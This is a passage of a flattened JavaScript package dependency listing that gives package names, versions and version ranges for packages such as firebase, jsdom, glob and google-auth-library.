color-convert 1.9.3 color-name@1.1.3 2.0.1 color-name@~1.1.4 color-name 1.1.3 1.1.4 color-support 1.1.3 colorette 1.4.0 combined-stream 1.0.7 delayed-stream@~1.0.0 1.0.8 delayed-stream@~1.0.0 commander 0.6.1 2.3.0 2.15.1 2.17.1 2.20.0 2.20.3 commondir 1.0.1 concat-map 0.0.1 concat-stream 1.6.2 buffer-from@^1.0.0 inherits@^2.0.3 readable-stream@^2.2.2 typedarray@^0.0.6 console-log-level 1.4.1 content-disposition 0.5.2 convert-source-map 1.6.0 safe-buffer@~5.1.1 2.0.0 core-js 3.6.5 3.46.0 core-js-compat 3.2.1 browserslist@^4.6.6 semver@^6.3.0 3.46.0 browserslist@^4.26.3 core-util-is 1.0.2 1.0.3 cross-spawn 5.0.1 lru-cache@^4.0.1 shebang-command@^1.2.0 which@^1.2.9 5.1.0 lru-cache@^4.0.1 shebang-command@^1.2.0 which@^1.2.9 6.0.5 nice-try@^1.0.4 path-key@^2.0.1 semver@^5.5.0 shebang-command@^1.2.0 which@^1.2.9 6.0.6 nice-try@^1.0.4 path-key@^2.0.1 semver@^5.5.0 shebang-command@^1.2.0 which@^1.2.9 7.0.6 
path-key@^3.1.0 shebang-command@^2.0.0 which@^2.0.1 cssom 0.3.4 0.3.8 0.4.1 0.4.4 cssstyle 1.1.1 cssom@0.3.x 1.4.0 cssom@0.3.x 2.0.0 cssom@~0.3.6 2.3.0 cssom@~0.3.6 custom-event-polyfill 1.0.7 dashdash 1.14.1 assert-plus@^1.0.0 dat.gui 0.7.3 0.7.9 data-urls 1.0.1 abab@^2.0.0 whatwg-mimetype@^2.1.0 whatwg-url@^7.0.0 1.1.0 abab@^2.0.0 whatwg-mimetype@^2.2.0 whatwg-url@^7.0.0 data-view-buffer 1.0.2 call-bound@^1.0.3 es-errors@^1.3.0 is-data-view@^1.0.2 data-view-byte-length 1.0.2 call-bound@^1.0.3 es-errors@^1.3.0 is-data-view@^1.0.2 data-view-byte-offset 1.0.1 call-bound@^1.0.2 es-errors@^1.3.0 is-data-view@^1.0.1 debug 2.2.0 ms@0.7.1 2.6.9 ms@2.0.0 3.1.0 ms@2.0.0 3.2.6 ms@^2.1.1 3.2.7 ms@^2.1.1 4.3.1 ms@2.1.2 4.3.3 ms@2.1.2 4.4.3 ms@^2.1.3 decamelize 1.2.0 2.0.0 xregexp@4.0.0 4.0.0 deep-eql 3.0.1 type-detect@^4.0.0 4.1.4 type-detect@^4.0.0 deep-is 0.1.3 0.1.4 deepmerge 4.2.2 4.3.1 define-data-property 1.1.4 es-define-property@^1.0.0 es-errors@^1.3.0 gopd@^1.0.1 define-properties 1.1.3 object-keys@^1.0.12 1.2.1 define-data-property@^1.0.1 has-property-descriptors@^1.0.0 object-keys@^1.1.1 delayed-stream 1.0.0 detect-libc 1.0.3 dhost 0.1.9 bytes@^3.1.0 chalk@^2.4.2 clipboardy@^1.2.3 he@^1.2.0 mime@^2.4.0 mri@^1.1.4 0.3.5 async-transforms@^1.0.7 bytes@^3.1.0 colorette@^1.2.1 esm-resolve@^1.0.4 gumnut@^0.3.8 he@^1.2.0 mime@^2.5.2 mri@^1.1.6 diff 1.4.0 3.5.0 5.0.0 5.2.0 dom-storage 2.1.0 domexception 1.0.1 webidl-conversions@^4.0.2 dunder-proto 1.0.1 call-bind-apply-helpers@^1.0.1 es-errors@^1.3.0 gopd@^1.2.0 duplexify 4.1.2 end-of-stream@^1.4.1 inherits@^2.0.3 readable-stream@^3.1.1 stream-shift@^1.0.0 4.1.3 end-of-stream@^1.4.1 inherits@^2.0.3 readable-stream@^3.1.1 stream-shift@^1.0.2 eastasianwidth 0.2.0 ecc-jsbn 0.1.2 jsbn@~0.1.0 safer-buffer@^2.1.0 ecdsa-sig-formatter 1.0.11 safe-buffer@^5.0.1 electron-to-chromium 1.3.81 1.3.264 1.5.244 1.5.245 emoji-regex 7.0.3 8.0.0 9.2.2 end-of-stream 1.4.1 once@^1.4.0 1.4.5 once@^1.4.0 ent 2.2.0 2.2.2 call-bound@^1.0.3 
es-errors@^1.3.0 punycode@^1.4.1 safe-regex-test@^1.1.0 entities 4.5.0 es-abstract 1.24.0 array-buffer-byte-length@^1.0.2 arraybuffer.prototype.slice@^1.0.4 available-typed-arrays@^1.0.7 call-bind@^1.0.8 call-bound@^1.0.4 data-view-buffer@^1.0.2 data-view-byte-length@^1.0.2 data-view-byte-offset@^1.0.1 es-define-property@^1.0.1 es-errors@^1.3.0 es-object-atoms@^1.1.1 es-set-tostringtag@^2.1.0 es-to-primitive@^1.3.0 function.prototype.name@^1.1.8 get-intrinsic@^1.3.0 get-proto@^1.0.1 get-symbol-description@^1.1.0 globalthis@^1.0.4 gopd@^1.2.0 has-property-descriptors@^1.0.2 has-proto@^1.2.0 has-symbols@^1.1.0 hasown@^2.0.2 internal-slot@^1.1.0 is-array-buffer@^3.0.5 is-callable@^1.2.7 is-data-view@^1.0.2 is-negative-zero@^2.0.3 is-regex@^1.2.1 is-set@^2.0.3 is-shared-array-buffer@^1.0.4 is-string@^1.1.1 is-typed-array@^1.1.15 is-weakref@^1.1.1 math-intrinsics@^1.1.0 object-inspect@^1.13.4 object-keys@^1.1.1 object.assign@^4.1.7 own-keys@^1.0.1 regexp.prototype.flags@^1.5.4 safe-array-concat@^1.1.3 safe-push-apply@^1.0.0 safe-regex-test@^1.1.0 set-proto@^1.0.0 stop-iteration-iterator@^1.1.0 string.prototype.trim@^1.2.10 string.prototype.trimend@^1.0.9 string.prototype.trimstart@^1.0.8 typed-array-buffer@^1.0.3 typed-array-byte-length@^1.0.3 typed-array-byte-offset@^1.0.4 typed-array-length@^1.0.7 unbox-primitive@^1.1.0 which-typed-array@^1.1.19 es-array-method-boxes-properly 1.0.0 es-define-property 1.0.1 es-errors 1.3.0 es-object-atoms 1.1.1 es-errors@^1.3.0 es-set-tostringtag 2.1.0 es-errors@^1.3.0 get-intrinsic@^1.2.6 has-tostringtag@^1.0.2 hasown@^2.0.2 es-to-primitive 1.3.0 is-callable@^1.2.7 is-date-object@^1.0.5 is-symbol@^1.0.4 es6-promise 4.2.8 es6-promisify 5.0.0 es6-promise@^4.0.3 escalade 3.1.1 3.2.0 escape-string-regexp 1.0.2 1.0.5 2.0.0 4.0.0 escodegen 1.11.0 esprima@^3.1.3 estraverse@^4.2.0 esutils@^2.0.2 optionator@^0.8.1 Opt|source-map@~0.6.1 source-map@~0.6.1 1.12.0 esprima@^3.1.3 estraverse@^4.2.0 esutils@^2.0.2 optionator@^0.8.1 
Opt|source-map@~0.6.1 source-map@~0.6.1 1.14.3 esprima@^4.0.1 estraverse@^4.2.0 esutils@^2.0.2 optionator@^0.8.1 Opt|source-map@~0.6.1 source-map@~0.6.1 eslint-visitor-keys 3.4.3 esm-resolve 1.0.6 1.0.11 espree 9.6.1 acorn@^8.9.0 acorn-jsx@^5.3.2 eslint-visitor-keys@^3.4.1 esprima 3.1.3 4.0.1 estraverse 4.2.0 4.3.0 5.3.0 estree-walker 1.0.1 2.0.2 esutils 2.0.2 2.0.3 event-target 1.2.3 event-target-shim 5.0.1 execa 0.8.0 cross-spawn@^5.0.1 get-stream@^3.0.0 is-stream@^1.1.0 npm-run-path@^2.0.0 p-finally@^1.0.0 signal-exit@^3.0.0 strip-eof@^1.0.0 0.10.0 cross-spawn@^6.0.0 get-stream@^3.0.0 is-stream@^1.1.0 npm-run-path@^2.0.0 p-finally@^1.0.0 signal-exit@^3.0.0 strip-eof@^1.0.0 1.0.0 cross-spawn@^6.0.0 get-stream@^4.0.0 is-stream@^1.1.0 npm-run-path@^2.0.0 p-finally@^1.0.0 signal-exit@^3.0.0 strip-eof@^1.0.0 extend 3.0.2 extract-zip 1.7.0 concat-stream@^1.6.2 debug@^2.6.9 mkdirp@^0.5.4 yauzl@^2.10.0 extsprintf 1.3.0 1.4.0 fancy-log 1.3.2 ansi-gray@^0.1.1 color-support@^1.1.3 time-stamp@^1.0.0 1.3.3 ansi-gray@^0.1.1 color-support@^1.1.3 parse-node-version@^1.0.0 time-stamp@^1.0.0 fast-async 6.3.8 nodent-compiler@^3.2.10 nodent-runtime@>=3.2.1 fast-deep-equal 1.1.0 3.1.3 fast-json-stable-stringify 2.0.0 2.1.0 fast-levenshtein 2.0.6 fast-text-encoding 1.0.3 1.0.6 fast-url-parser 1.1.3 punycode@^1.3.2 faye-websocket 0.11.3 websocket-driver@>=0.5.1 0.11.4 websocket-driver@>=0.5.1 fd-slicer 1.1.0 pend@~1.2.0 fill-range 7.0.1 to-regex-range@^5.0.1 7.1.1 to-regex-range@^5.0.1 find-up 3.0.0 locate-path@^3.0.0 5.0.0 locate-path@^6.0.0 path-exists@^4.0.0 firebase 8.10.0 @firebase/analytics@0.6.18 @firebase/app@0.6.30 @firebase/app-check@0.3.2 @firebase/app-types@0.6.3 @firebase/auth@0.16.8 @firebase/database@0.11.0 @firebase/firestore@2.4.0 @firebase/functions@0.6.15 @firebase/installations@0.4.32 @firebase/messaging@0.8.0 @firebase/performance@0.4.18 @firebase/polyfill@0.3.36 @firebase/remote-config@0.1.43 @firebase/storage@0.7.0 @firebase/util@1.3.0 8.10.1 
@firebase/analytics@0.6.18 @firebase/app@0.6.30 @firebase/app-check@0.3.2 @firebase/app-types@0.6.3 @firebase/auth@0.16.8 @firebase/database@0.11.0 @firebase/firestore@2.4.1 @firebase/functions@0.6.16 @firebase/installations@0.4.32 @firebase/messaging@0.8.0 @firebase/performance@0.4.18 @firebase/polyfill@0.3.36 @firebase/remote-config@0.1.43 @firebase/storage@0.7.1 @firebase/util@1.3.0 9.23.0 @firebase/analytics@0.10.0 @firebase/analytics-compat@0.2.6 @firebase/app@0.9.13 @firebase/app-check@0.8.0 @firebase/app-check-compat@0.3.7 @firebase/app-compat@0.2.13 @firebase/app-types@0.9.0 @firebase/auth@0.23.2 @firebase/auth-compat@0.4.2 @firebase/database@0.14.4 @firebase/database-compat@0.3.4 @firebase/firestore@3.13.0 @firebase/firestore-compat@0.3.12 @firebase/functions@0.10.0 @firebase/functions-compat@0.3.5 @firebase/installations@0.6.4 @firebase/installations-compat@0.2.4 @firebase/messaging@0.12.4 @firebase/messaging-compat@0.2.4 @firebase/performance@0.6.4 @firebase/performance-compat@0.2.4 @firebase/remote-config@0.4.4 @firebase/remote-config-compat@0.2.4 @firebase/storage@0.11.2 @firebase/storage-compat@0.3.2 @firebase/util@1.9.3 10.14.1 @firebase/analytics@0.10.8 @firebase/analytics-compat@0.2.14 @firebase/app@0.10.13 @firebase/app-check@0.8.8 @firebase/app-check-compat@0.3.15 @firebase/app-compat@0.2.43 @firebase/app-types@0.9.2 @firebase/auth@1.7.9 @firebase/auth-compat@0.5.14 @firebase/data-connect@0.1.0 @firebase/database@1.0.8 @firebase/database-compat@1.0.8 @firebase/firestore@4.7.3 @firebase/firestore-compat@0.3.38 @firebase/functions@0.11.8 @firebase/functions-compat@0.3.14 @firebase/installations@0.6.9 @firebase/installations-compat@0.2.9 @firebase/messaging@0.12.12 @firebase/messaging-compat@0.2.12 @firebase/performance@0.6.9 @firebase/performance-compat@0.2.9 @firebase/remote-config@0.4.9 @firebase/remote-config-compat@0.2.9 @firebase/storage@0.13.2 @firebase/storage-compat@0.3.12 @firebase/util@1.10.0 @firebase/vertexai-preview@0.0.4 11.10.0 
@firebase/ai@1.4.1 @firebase/analytics@0.10.17 @firebase/analytics-compat@0.2.23 @firebase/app@0.13.2 @firebase/app-check@0.10.1 @firebase/app-check-compat@0.3.26 @firebase/app-compat@0.4.2 @firebase/app-types@0.9.3 @firebase/auth@1.10.8 @firebase/auth-compat@0.5.28 @firebase/data-connect@0.3.10 @firebase/database@1.0.20 @firebase/database-compat@2.0.11 @firebase/firestore@4.8.0 @firebase/firestore-compat@0.3.53 @firebase/functions@0.12.9 @firebase/functions-compat@0.3.26 @firebase/installations@0.6.18 @firebase/installations-compat@0.2.18 @firebase/messaging@0.12.22 @firebase/messaging-compat@0.2.22 @firebase/performance@0.7.7 @firebase/performance-compat@0.2.20 @firebase/remote-config@0.6.5 @firebase/remote-config-compat@0.2.18 @firebase/storage@0.13.14 @firebase/storage-compat@0.3.24 @firebase/util@1.12.1 flat 4.1.1 is-buffer@~2.0.3 5.0.2 for-each 0.3.5 is-callable@^1.2.7 foreground-child 3.3.1 cross-spawn@^7.0.6 signal-exit@^4.0.1 forever-agent 0.6.1 form-data 2.3.2 asynckit@^0.4.0 combined-stream@1.0.6 mime-types@^2.1.12 2.3.3 asynckit@^0.4.0 combined-stream@^1.0.6 mime-types@^2.1.12 2.5.5 asynckit@^0.4.0 combined-stream@^1.0.8 es-set-tostringtag@^2.1.0 hasown@^2.0.2 mime-types@^2.1.35 safe-buffer@^5.2.1 formatio 1.1.1 samsam@~1.1 fraction.js 4.3.7 fs.realpath 1.0.0 fsevents 2.1.3 2.3.2 2.3.3 function-bind 1.1.1 1.1.2 function.prototype.name 1.1.8 call-bind@^1.0.8 call-bound@^1.0.3 define-properties@^1.2.1 functions-have-names@^1.2.3 hasown@^2.0.2 is-callable@^1.2.7 functions-have-names 1.2.3 gaxios 4.3.2 abort-controller@^3.0.0 extend@^3.0.2 https-proxy-agent@^5.0.0 is-stream@^2.0.0 node-fetch@^2.6.1 4.3.3 abort-controller@^3.0.0 extend@^3.0.2 https-proxy-agent@^5.0.0 is-stream@^2.0.0 node-fetch@^2.6.7 5.1.3 extend@^3.0.2 https-proxy-agent@^5.0.0 is-stream@^2.0.0 node-fetch@^2.6.9 6.7.1 extend@^3.0.2 https-proxy-agent@^7.0.1 is-stream@^2.0.0 node-fetch@^2.6.9 uuid@^9.0.1 gcp-metadata 4.3.1 gaxios@^4.0.0 json-bigint@^1.0.0 5.3.0 gaxios@^5.0.0 
json-bigint@^1.0.0 6.1.1 gaxios@^6.1.1 google-logging-utils@^0.0.2 json-bigint@^1.0.0 generator-function 2.0.1 gensync 1.0.0-beta.2 get-caller-file 1.0.3 2.0.5 get-func-name 2.0.0 2.0.2 get-intrinsic 1.3.1 async-function@^1.0.0 async-generator-function@^1.0.0 call-bind-apply-helpers@^1.0.2 es-define-property@^1.0.1 es-errors@^1.3.0 es-object-atoms@^1.1.1 function-bind@^1.1.2 generator-function@^2.0.0 get-proto@^1.0.1 gopd@^1.2.0 has-symbols@^1.1.0 hasown@^2.0.2 math-intrinsics@^1.1.0 get-proto 1.0.1 dunder-proto@^1.0.1 es-object-atoms@^1.0.0 get-stream 3.0.0 4.1.0 pump@^3.0.0 get-symbol-description 1.1.0 call-bound@^1.0.3 es-errors@^1.3.0 get-intrinsic@^1.2.6 getpass 0.1.7 assert-plus@^1.0.0 git-last-commit 1.0.1 glob 3.2.11 inherits@2 minimatch@0.3 7.1.2 fs.realpath@^1.0.0 inflight@^1.0.4 inherits@2 minimatch@^3.0.4 once@^1.3.0 path-is-absolute@^1.0.0 7.1.3 fs.realpath@^1.0.0 inflight@^1.0.4 inherits@2 minimatch@^3.0.4 once@^1.3.0 path-is-absolute@^1.0.0 7.1.6 fs.realpath@^1.0.0 inflight@^1.0.4 inherits@2 minimatch@^3.0.4 once@^1.3.0 path-is-absolute@^1.0.0 7.2.0 fs.realpath@^1.0.0 inflight@^1.0.4 inherits@2 minimatch@^3.0.4 once@^1.3.0 path-is-absolute@^1.0.0 7.2.3 fs.realpath@^1.0.0 inflight@^1.0.4 inherits@2 minimatch@^3.1.1 once@^1.3.0 path-is-absolute@^1.0.0 8.1.0 fs.realpath@^1.0.0 inflight@^1.0.4 inherits@2 minimatch@^5.0.1 once@^1.3.0 11.0.3 foreground-child@^3.3.1 jackspeak@^4.1.1 minimatch@^10.0.3 minipass@^7.1.2 package-json-from-dist@^1.0.0 path-scurry@^2.0.0 glob-parent 5.0.0 is-glob@^4.0.1 5.1.2 is-glob@^4.0.1 glob-slash 1.0.0 glob-slasher 1.0.1 glob-slash@^1.0.0 lodash.isobject@^2.4.1 toxic@^1.0.0 globals 11.8.0 globalthis 1.0.4 define-properties@^1.2.1 gopd@^1.0.1 google-auth-library 7.10.1 arrify@^2.0.0 base64-js@^1.3.0 ecdsa-sig-formatter@^1.0.11 fast-text-encoding@^1.0.0 gaxios@^4.0.0 gcp-metadata@^4.2.0 gtoken@^5.0.4 jws@^4.0.0 lru-cache@^6.0.0 7.14.1 arrify@^2.0.0 base64-js@^1.3.0 ecdsa-sig-formatter@^1.0.11 fast-text-encoding@^1.0.0 
gaxios@^4.0.0 gcp-metadata@^4.2.0 gtoken@^5.0.4 jws@^4.0.0 lru-cache@^6.0.0 8.9.0 arrify@^2.0.0 base64-js@^1.3.0 ecdsa-sig-formatter@^1.0.11 fast-text-encoding@^1.0.0 gaxios@^5.0.0 gcp-metadata@^5.3.0 gtoken@^6.1.0 jws@^4.0.0 lru-cache@^6.0.0 9.15.1 base64-js@^1.3.0 ecdsa-sig-formatter@^1.0.11 gaxios@^6.1.1 gcp-metadata@^6.1.0 gtoken@^7.0.0 jws@^4.0.0 google-closure-compiler 20190909.0.0 chalk@2.x google-closure-compiler-java@^20190909.0.0 google-closure-compiler-js@^20190909.0.0 google-closure-compiler-linux@^20190909.0.0 Opt|google-closure-compiler-linux@^20190909.0.0 google-closure-compiler-osx@^20190909.0.0 Opt|google-closure-compiler-osx@^20190909.0.0 google-closure-compiler-windows@^20190909.0.0 Opt|google-closure-compiler-windows@^20190909.0.0 minimist@1.x vinyl@2.x vinyl-sourcemaps-apply@^0.2.0 google-closure-compiler-java 20190909.0.0 google-closure-compiler-js 20190909.0.0 google-closure-compiler-linux 20190909.0.0 google-closure-compiler-osx 20190909.0.0 google-closure-compiler-windows 20190909.0.0 google-closure-library 20190909.0.0 20190929.0.0 20191027.0.1 promises-aplus-tests@^2.1.2 20191111.0.0 promises-aplus-tests@^2.1.2 20200101.0.0 promises-aplus-tests@^2.1.2 20200112.0.0 promises-aplus-tests@^2.1.2 20200204.0.0 20200224.0.0 20200315.0.0 google-gax 2.28.0 @grpc/grpc-js@~1.4.0 @grpc/proto-loader@^0.6.1 @types/long@^4.0.0 abort-controller@^3.0.0 duplexify@^4.0.0 fast-text-encoding@^1.0.3 google-auth-library@^7.6.1 is-stream-ended@^0.1.4 node-fetch@^2.6.1 object-hash@^2.1.1 proto3-json-serializer@^0.1.1 protobufjs@6.11.2 retry-request@^4.0.0 2.30.5 @grpc/grpc-js@~1.6.0 @grpc/proto-loader@^0.6.12 @types/long@^4.0.0 abort-controller@^3.0.0 duplexify@^4.0.0 fast-text-encoding@^1.0.3 google-auth-library@^7.14.0 is-stream-ended@^0.1.4 node-fetch@^2.6.1 object-hash@^3.0.0 proto3-json-serializer@^0.1.8 protobufjs@6.11.3 retry-request@^4.0.0 3.6.1 @grpc/grpc-js@~1.8.0 @grpc/proto-loader@^0.7.0 @types/long@^4.0.0 @types/rimraf@^3.0.2 abort-controller@^3.0.0 
duplexify@^4.0.0 fast-text-encoding@^1.0.3 google-auth-library@^8.0.2 is-stream-ended@^0.1.4 node-fetch@^2.6.1 object-hash@^3.0.0 proto3-json-serializer@^1.0.0 protobufjs@7.2.4 protobufjs-cli@1.1.1 retry-request@^5.0.0 4.6.1 @grpc/grpc-js@^1.10.9 @grpc/proto-loader@^0.7.13 @types/long@^4.0.0 abort-controller@^3.0.0 duplexify@^4.0.0 google-auth-library@^9.3.0 node-fetch@^2.7.0 object-hash@^3.0.0 proto3-json-serializer@^2.0.2 protobufjs@^7.3.2 retry-request@^7.0.0 uuid@^9.0.1 google-logging-utils 0.0.2 google-p12-pem 3.1.2 node-forge@^0.10.0 3.1.4 node-forge@^1.3.1 4.0.1 node-forge@^1.3.1 gopd 1.2.0 graceful-fs 4.2.11 growl 1.9.2 1.10.5 gtoken 5.3.1 gaxios@^4.0.0 google-p12-pem@^3.0.3 jws@^4.0.0 5.3.2 gaxios@^4.0.0 google-p12-pem@^3.1.3 jws@^4.0.0 6.1.2 gaxios@^5.0.1 google-p12-pem@^4.0.0 jws@^4.0.0 7.1.0 gaxios@^6.0.0 jws@^4.0.0 gumnut 0.3.9 har-schema 2.0.0 har-validator 5.1.0 ajv@^5.3.0 har-schema@^2.0.0 5.1.5 ajv@^6.12.3 har-schema@^2.0.0 has 1.0.3 function-bind@^1.1.1 has-bigints 1.1.0 has-flag 3.0.0 4.0.0 has-property-descriptors 1.0.2 es-define-property@^1.0.0 has-proto 1.2.0 dunder-proto@^1.0.0 has-symbols 1.0.0 1.1.0 has-tostringtag 1.0.2 has-symbols@^1.0.3 hasown 2.0.2 function-bind@^1.1.2 he 1.1.1 1.2.0 html-encoding-sniffer 1.0.2 whatwg-encoding@^1.0.1 html-entities 1.2.1 1.4.0 html-minifier 4.0.0 camel-case@^3.0.0 clean-css@^4.2.1 commander@^2.19.0 he@^1.2.0 param-case@^2.1.1 relateurl@^0.2.7 uglify-js@^3.5.1 html-modules-polyfill 0.1.0 jsdom@^15.1.1 rollup@^1.19.4 http-parser-js 0.5.3 0.5.10 http-proxy-agent 5.0.0 @tootallnate/once@2 agent-base@6 debug@4 http-signature 1.2.0 assert-plus@^1.0.0 jsprim@^1.2.2 sshpk@^1.7.0 https-proxy-agent 2.2.4 agent-base@^4.3.0 debug@^3.1.0 5.0.0 agent-base@6 debug@4 5.0.1 agent-base@6 debug@4 7.0.6 agent-base@^7.1.2 debug@4 iconv-lite 0.4.24 safer-buffer@>= 2.1.2 < 3 idb 3.0.2 7.0.1 7.1.1 iframe-load 0.1.4 immutable 5.1.4 inflight 1.0.6 once@^1.3.0 wrappy@1 inherits 2.0.3 2.0.4 internal-slot 1.1.0 es-errors@^1.3.0 
hasown@^2.0.2 side-channel@^1.1.0 invariant 2.2.4 loose-envify@^1.0.0 invert-kv 2.0.0 ip-regex 2.1.0 is-arguments 1.2.0 call-bound@^1.0.2 has-tostringtag@^1.0.2 is-array-buffer 3.0.5 call-bind@^1.0.8 call-bound@^1.0.3 get-intrinsic@^1.2.6 is-async-function 2.1.1 async-function@^1.0.0 call-bound@^1.0.3 get-proto@^1.0.1 has-tostringtag@^1.0.2 safe-regex-test@^1.1.0 is-bigint 1.1.0 has-bigints@^1.0.2 is-binary-path 2.1.0 binary-extensions@^2.0.0 is-boolean-object 1.2.2 call-bound@^1.0.3 has-tostringtag@^1.0.2 is-buffer 2.0.5 is-builtin-module 3.2.1 builtin-modules@^3.3.0 is-callable 1.2.7 is-core-module 2.8.0 has@^1.0.3 2.16.1 hasown@^2.0.2 is-data-view 1.0.2 call-bound@^1.0.2 get-intrinsic@^1.2.6 is-typed-array@^1.1.13 is-date-object 1.1.0 call-bound@^1.0.2 has-tostringtag@^1.0.2 is-docker 2.2.1 is-extglob 2.1.1 is-finalizationregistry 1.1.1 call-bound@^1.0.3 is-fullwidth-code-point 1.0.0 number-is-nan@^1.0.0 2.0.0 3.0.0 is-generator-function 1.1.2 call-bound@^1.0.4 generator-function@^2.0.0 get-proto@^1.0.1 has-tostringtag@^1.0.2 safe-regex-test@^1.1.0 is-glob 4.0.1 is-extglob@^2.1.1 4.0.3 is-extglob@^2.1.1 is-map 2.0.3 is-module 1.0.0 is-negative-zero 2.0.3 is-number 7.0.0 is-number-object 1.1.1 call-bound@^1.0.3 has-tostringtag@^1.0.2 is-plain-obj 2.1.0 is-reference 1.2.1 @types/estree@* is-regex 1.2.1 call-bound@^1.0.2 gopd@^1.2.0 has-tostringtag@^1.0.2 hasown@^2.0.2 is-set 2.0.3 is-shared-array-buffer 1.0.4 call-bound@^1.0.3 is-stream 1.1.0 2.0.1 is-stream-ended 0.1.4 is-string 1.1.1 call-bound@^1.0.3 has-tostringtag@^1.0.2 is-symbol 1.1.1 call-bound@^1.0.2 has-symbols@^1.1.0 safe-regex-test@^1.1.0 is-typed-array 1.1.15 which-typed-array@^1.1.16 is-typedarray 1.0.0 is-unicode-supported 0.1.0 is-weakmap 2.0.2 is-weakref 1.1.1 call-bound@^1.0.3 is-weakset 2.0.4 call-bound@^1.0.3 get-intrinsic@^1.2.6 is-wsl 2.2.0 is-docker@^2.0.0 isarray 1.0.0 2.0.5 isexe 2.0.0 isstream 0.1.2 jackspeak 4.1.1 @isaacs/cliui@^8.0.2 jade 0.26.3 commander@0.6.1 mkdirp@0.3.0 jquery 3.5.0 
3.7.1 js-levenshtein 1.1.6 js-tokens 4.0.0 js-yaml 3.13.1 argparse@^1.0.7 esprima@^4.0.0 4.0.0 argparse@^2.0.1 4.1.0 argparse@^2.0.1 js2xmlparser 4.0.2 xmlcreate@^2.0.4 jsbn 0.1.1 jsdoc 4.0.5 @babel/parser@^7.20.15 @jsdoc/salty@^0.2.1 @types/markdown-it@^14.1.1 bluebird@^3.7.2 catharsis@^0.9.0 escape-string-regexp@^2.0.0 js2xmlparser@^4.0.2 klaw@^3.0.0 markdown-it@^14.1.0 markdown-it-anchor@^8.6.7 marked@^4.0.10 mkdirp@^1.0.4 requizzle@^0.2.3 strip-json-comments@^3.1.0 underscore@~1.13.2 jsdom 12.2.0 abab@^2.0.0 acorn@^6.0.2 acorn-globals@^4.3.0 array-equal@^1.0.0 cssom@^0.3.4 cssstyle@^1.1.1 data-urls@^1.0.1 domexception@^1.0.1 escodegen@^1.11.0 html-encoding-sniffer@^1.0.2 nwsapi@^2.0.9 parse5@5.1.0 pn@^1.1.0 request@^2.88.0 request-promise-native@^1.0.5 saxes@^3.1.3 symbol-tree@^3.2.2 tough-cookie@^2.4.3 w3c-hr-time@^1.0.1 webidl-conversions@^4.0.2 whatwg-encoding@^1.0.5 whatwg-mimetype@^2.2.0 whatwg-url@^7.0.0 ws@^6.1.0 xml-name-validator@^3.0.0 15.2.0 abab@^2.0.0 acorn@^7.1.0 acorn-globals@^4.3.2 array-equal@^1.0.0 Scope peer|canvas@^2.5.0 cssom@^0.4.1 cssstyle@^2.0.0 data-urls@^1.1.0 domexception@^1.0.1 escodegen@^1.11.1 html-encoding-sniffer@^1.0.2 nwsapi@^2.1.4 parse5@5.1.0 pn@^1.1.0 request@^2.88.0 request-promise-native@^1.0.7 saxes@^3.1.9 symbol-tree@^3.2.2 tough-cookie@^3.0.1 w3c-hr-time@^1.0.1 w3c-xmlserializer@^1.1.2 webidl-conversions@^4.0.2 whatwg-encoding@^1.0.5 whatwg-mimetype@^2.3.0 whatwg-url@^7.0.0 ws@^7.0.0 xml-name-validator@^3.0.0 15.2.1 abab@^2.0.0 acorn@^7.1.0 acorn-globals@^4.3.2 array-equal@^1.0.0 Scope peer|canvas@^2.5.0 cssom@^0.4.1 cssstyle@^2.0.0 data-urls@^1.1.0 domexception@^1.0.1 escodegen@^1.11.1 html-encoding-sniffer@^1.0.2 nwsapi@^2.2.0 parse5@5.1.0 pn@^1.1.0 request@^2.88.0 request-promise-native@^1.0.7 saxes@^3.1.9 symbol-tree@^3.2.2 tough-cookie@^3.0.1 w3c-hr-time@^1.0.1 w3c-xmlserializer@^1.1.2 webidl-conversions@^4.0.2 whatwg-encoding@^1.0.5 whatwg-mimetype@^2.3.0 whatwg-url@^7.0.0 ws@^7.0.0 xml-name-validator@^3.0.0 jsesc 
0.5.0 2.5.1 3.1.0 json-bigint 1.0.0 bignumber.js@^9.0.0 json-schema 0.2.3 0.4.0 json-schema-traverse 0.3.1 0.4.1 json-stringify-safe 5.0.1 json5 2.1.0 minimist@^1.2.0 2.2.3 jsprim 1.4.1 assert-plus@1.0.0 extsprintf@1.3.0 json-schema@0.2.3 verror@1.10.0 1.4.2 assert-plus@1.0.0 extsprintf@1.3.0 json-schema@0.4.0 verror@1.10.0 jwa 2.0.0 buffer-equal-constant-time@1.0.1 ecdsa-sig-formatter@1.0.11 safe-buffer@^5.0.1 2.0.1 buffer-equal-constant-time@^1.0.1 ecdsa-sig-formatter@1.0.11 safe-buffer@^5.0.1 jws 4.0.0 jwa@^2.0.0 safe-buffer@^5.0.1 klaw 3.0.0 graceful-fs@^4.1.9 lcid 2.0.0 invert-kv@^2.0.0 levn 0.3.0 prelude-ls@~1.1.2 type-check@~0.3.2 linkify-it 5.0.0 uc.micro@^2.0.0 lit-element 2.2.1 lit-html@^1.0.0 2.5.1 lit-html@^1.1.1 lit-html 1.1.1 1.4.1 locate-path 3.0.0 p-locate@^3.0.0 path-exists@^3.0.0 6.0.0 p-locate@^5.0.0 lodash 4.17.20 4.17.21 lodash._objecttypes 2.4.1 lodash.camelcase 4.3.0 lodash.debounce 4.0.8 lodash.isobject 2.4.1 lodash._objecttypes@~2.4.1 lodash.sortby 4.7.0 log-symbols 2.2.0 chalk@^2.0.1 3.0.0 chalk@^2.4.2 4.0.0 chalk@^4.0.0 4.1.0 chalk@^4.1.0 is-unicode-supported@^0.1.0 lolex 1.3.2 long 4.0.0 5.3.2 loose-envify 1.4.0 js-tokens@^3.0.0 || ^4.0.0 lottie-web 5.5.10 5.13.0 loupe 2.3.7 get-func-name@^2.0.1 lower-case 1.1.4 lru-cache 2.7.3 4.1.5 pseudomap@^1.0.2 yallist@^2.1.2 5.1.1 yallist@^3.0.2 6.0.0 yallist@^4.0.0 11.2.2 magic-string 0.25.7 sourcemap-codec@^1.4.4 0.25.9 sourcemap-codec@^1.4.8 map-age-cleaner 0.1.2 p-defer@^1.0.0 0.1.3 p-defer@^1.0.0 markdown-it 14.1.0 argparse@^2.0.1 entities@^4.4.0 linkify-it@^5.0.0 mdurl@^2.0.0 punycode.js@^2.3.1 uc.micro@^2.1.0 markdown-it-anchor 8.6.7 Scope peer|@types/markdown-it@* Scope peer|markdown-it@* marked 4.3.0 matchit 1.0.8 @arr/every@^1.0.0 1.1.0 @arr/every@^1.0.0 math-intrinsics 1.1.0 mdurl 2.0.0 mem 4.0.0 map-age-cleaner@^0.1.1 mimic-fn@^1.0.0 p-is-promise@^1.1.0 4.3.0 map-age-cleaner@^0.1.1 mimic-fn@^2.0.0 